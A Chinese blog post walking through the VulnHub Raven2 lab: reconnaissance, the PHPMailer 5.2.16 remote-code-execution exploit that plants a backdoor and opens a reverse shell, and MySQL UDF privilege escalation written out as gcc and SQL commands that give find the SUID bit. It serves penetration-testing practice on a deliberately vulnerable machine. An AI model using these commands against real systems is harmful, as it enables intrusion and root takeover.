vulnhub靶场,Raven2

最新推荐文章于 2024-04-24 10:33:16 发布
最新推荐文章于 2024-04-24 10:33:16 发布
阅读量1.2k 收藏 5
点赞数 2
分类专栏: 靶场实战 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/118888664
版权

vulnhub靶场,Raven2

环境准备

靶机下载地址:https://www.vulnhub.com/entry/raven-2,269/
攻击机:kali(192.168.58.130)
靶机:Raven2(192.168.58.157)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

使用nmap扫描查看目标靶机端口开放情况

开放端口:22、80、111、56784
浏览器访问目标靶机80端口

就是一个非常普通的页面,没有啥好利用的
网站目录结构扫描

dirb http://192.168.58.157/


只查看一级目录,然后挨个去访问试试
访问http://192.168.58.157/vendor/时,出现如下页面

然后挨个去查看,查看PATH文件时,成功获取到第一个flag

查看README.md文件,可以看到目标网站安装了PHPMailer

查看VERSION文件,可以看到PHPMailer版本为5.2.16

上面目录扫描发现下面还有一个wordpress的网站,访问试试

可以看到输入的IP变为一个域名了,肯定是域名重定向了
进入配置文件/etc/hots,进行配置

再次访问成功找到wordpress主网页

既然知道网站CMS为wordpress,那就使用wpscan扫描看看

wpscan --url http://192.168.58.157/wordpress/


就只知道了CMS的版本号,没有啥大用处
前面扫描发现网站安装了PHPMailer,在kali的漏洞库里搜索PHPMailer存在的漏洞

渗透过程

前面信息收集看到PHPMailer确实存在漏洞,然后这里使用40974.py
将攻击代码复制到本地

查看其内容,发现有几个位置是需要修改的
开头要加上

#!/usr/bin/python
# -*- coding: utf-8 -*-


防止乱码出现错误
然后在如下位置进行修改

保存后退出,这个存在漏洞的网页是在contact.php里,运行这个攻击文件会自动在网站根目录下面生成一个后门文件icepeak.php

这个错误是没有安装requests_toolbelt,使用pip install安装一下

这个提示是python3中已经安装了requests_toolbelt,所以使用python3去运行

python3 40974.py


然后使用kali监听8888端口

浏览器访问后门文件

可以看到kali这边成功反弹到一个shell

使用find命令查找flag

find / -name flag*


成功找到flag2和flag3

权限提升

利用工具LinEnum(Linux枚举及权限提升检查工具)
下载地址:https://github.com/rebootuser/LinEnum

开启一个临时服务器

靶机使用wegt将LinEnum.sh下载到本地

给LinEnum.sh执行的权限

运行LinEnum.sh

可以看到mysql服务器是以root身份运行的
进入wordpress网站的根目录,查看wp-config.php的信息

可以看到里面放着mysql的账号和密码:root:R@v3nSecurity
登入mysql服务器,查看你mysql版本信息

网上搜索关键字

可以看到可以使用udf提权
kali漏洞库搜索udf

这里使用1518.c
将1518.c下载到本地

然后进行编译

gcc -g -c 1518.c 
gcc -g -shared -o icepeak.so 1518.o -lc

-g 生成调试信息
-c 编译(二进制)
-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
-o:执行命令后的文件名
-lc:-l 库 c库名


开启一个临时服务器

靶机将icepak.so下载到本地

进入数据库,发现是具有读和写的权限的

use mysql; 
#进入数据库
create table foo(line blob); 
#创建数据表foo
insert into foo values(load_file('/tmp/icepeak.so')); 
#插入数据
select * from foo into dumpfile '/usr/lib/mysql/plugin/icepeak.so'; 
#( Foo表成功插入二进制数据,
然后利用dumpfile函数把文件导出
outfile 多行导出,dumpfile一行导出
outfile会有特殊的转换,而dumpfile是原数据导出
新建存储函数)
create function do_system returns integer soname 'icepeak.so'; 
#(创建自定义函数do_system 类型是integer,别名
soname文件名字然后查询函数是否创建成功)
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find'); 
#(调用do_system函数来给find命令所有者的suid权限,使其可以执行
 root命令)
quit


退出mysql,使用/usr/bin/find提权

可以看到权限已经为root了,切换其根目录,发现最后一个flag,Raven2靶机所有flag查找完毕,至此,Raven2靶机渗透结束

super 硕
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Raven:Javascript框架
05-05
掠夺 Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大更改以适应由应用程序驱动的扩展,并且主要侧重于动画和移动支持。
Rraven:将R与Raven集成
04-28
拉文 Rraven软件包旨在促进R和()之间的数据交换。 提供了非常强大的工具来分析(动物)声音。 R可以简化复杂分析程序的自动化过程。 此外,R包(如 , 和 (以及其他))提供了其他分析方法,可作为发现的软件包的完美补充。 因此,桥接这些应用程序可以大大扩展生物声学家的工具包。 当前, 大多数分析无法在命令终端中在后台运行。 因此,大多数Rraven函数的设计都是为了简化两个程序之间的数据交换,在某些情况下,还可以将文件导出到进行进一步分析。 从CRAN安装/加载程序包,如下所示: # From CRAN would be # install.packages("Rraven") # load package library( Rraven ) 要从安装最新的开发版本,您将需要R包 : # From CRAN would be # install.packages("Rrav
Raven2掠夺者2》 PC端一键下载+预约注册教程
最新发布
weixin_62825745的博客
04-24 723
不过,网石介绍说,这次的新作不是动作RPG,而是正在开发中的全新大型MMORPG,继承了独特的黑暗奇幻世界观。进入官网后,只需要选择PC端后,输入手机号码,勾选【必填】项,完成上述操作后,点击【预登记】,即可完成登记注册。查看奇游,只需要在奇游上查看《Raven 2掠夺者2》并启用优化,即可让玩家们在游戏过程中稳定游玩。玩家们可以在下载好的游戏启动器中,勾选同意服务协议后,点击【PC版本预约注册】可以进行预约注册。玩家们在奇游中启用优化后,点击详细页面,即可点击一键下载。注意,最好下载到全英文路径中~
VulnhubRaven2靶场(MySQL的UDF提权)
ierciyuan的博客
06-13 370
这个靶场思路清晰,主要涉及PHPMailer远程命令执行漏洞利用以及MySQL的UDF提权,本文主要展示详细的打靶过程。
vulhubRaven2
qq_38618396的博客
09-26 534
基本信息 靶机 靶机地址: Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z Download (Mirror): https://download.vulnhub.com/raven/Raven2.ova Download (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent ( Magnet) 靶机难度:中等 靶机描述
[B2R]Raven: 2靶机
weixin_43886198的博客
12-13 819
[B2R]Raven: 2 靶场地址 靶场信息 靶场描述 Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach R
vulnhub靶机——RAVEN: 2
qq_44029310的博客
09-12 1907
本文涉及知识点有:靶机环境搭建,dirsearch工具使用,DS_Store信息泄露漏洞,wpscan使用,利用PHPMailer命令执行漏洞获取shell,UDF提权。
raven2
学习!冲冲冲!
06-12 692
raven2
vulnhubRaven2
鲨鱼辣椒的博客
08-05 256
信息搜集 扫描网段发现存活主机 扫描IP地址发现开放端口以及服务 浏览器查看网站
【甄选靶场Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
人间体佐菲的博客
09-05 819
【甄选靶场Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
vulnhubraven2
weixin_54431413的博客
07-01 495
phpmailer漏洞利用,需要根据实时情况修改exp,udf提权: 拷贝kali自带的链接库文件,创建表,将链接库文件写入到表中,造成表里dump到对应路径中,之后创造自定义函数,利用自定义函数执行操作系统命令,这个mysql属主是root,成功提权。...
raven
03-07
通过键入以下命令来git clone https://github.com/icebox827/raven 在终端中运行bundle install 在终端中运行db:create以创建数据库在终端中运行db:migrate以迁移数据库rails s 开始添加用户并创建事件现场演示技术...
RavenPy:用于设置和运行水文建模框架Raven的Python包装器
04-06
用pip下载并编译Raven 从Python配置,运行和解析Raven输出 参数,模型或分水岭的并行模拟 实用程序命令来创建网格权重文件 提取有关流域的地貌信息 从非流域估计模型参数的算法 将输出(流,存储)公开为xarray....
raven-for-redux:用于Redux的Raven中间件
02-05
Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK的该库的API兼容分支! 用于Redux的Raven中间件 注意:需要Raven> = 3.9.0。 Raven 3.14.0有此库触发 将每个调度动作的类型记录...
vulnhub-Raven2
LuckySec
12-03 777
0x01 靶场简介 Raven 2是中级boot2root VM, 有4个flag需要搜集,在多次被攻破后,Raven Security 采取了额外的措施来加固其Web服务器,以防止黑客入侵。您是否仍然可以攻破Raven? 靶场下载:https://download.vulnhub.com/raven/Raven2.ova 0x02 靶场渗透 1. flag1 使用Nmap探测靶机IP地址 nmap -sP 192.168.126.0/24 确定IP地址后,扫描开放的端口和服务 Nmap -p 1-65
Vulnhub系列靶机---Raven2
qq_45953122的博客
10-13 763
用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell。浏览器访问http://192.168.160.47/contact.php生成后门文件。需要提权,chmod修改权限后,再./LinEnum.sh执行。此时,/usr/bin/find 就具备了SUID 权限。
vulnhub打靶--raven2
m0_52920608的博客
07-21 100
vulnhub raven2打靶
Raven: 2(第三方漏洞getshell,linux数据库udf提权)
weixin_51423993的博客
01-20 3970
靶机下载地址 https://www.vulnhub.com/entry/raven-2,269/ -ls去掉?成功执行 不连接mysql的root就无权限发到那个目录
vulnhub-Raven2靶场(中)
leo788的博客
03-04 364
通过raven2靶场练习对mysql提权中udf提权的方式的掌握。
vulnhub靶机——raven: 2
09-03
- *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值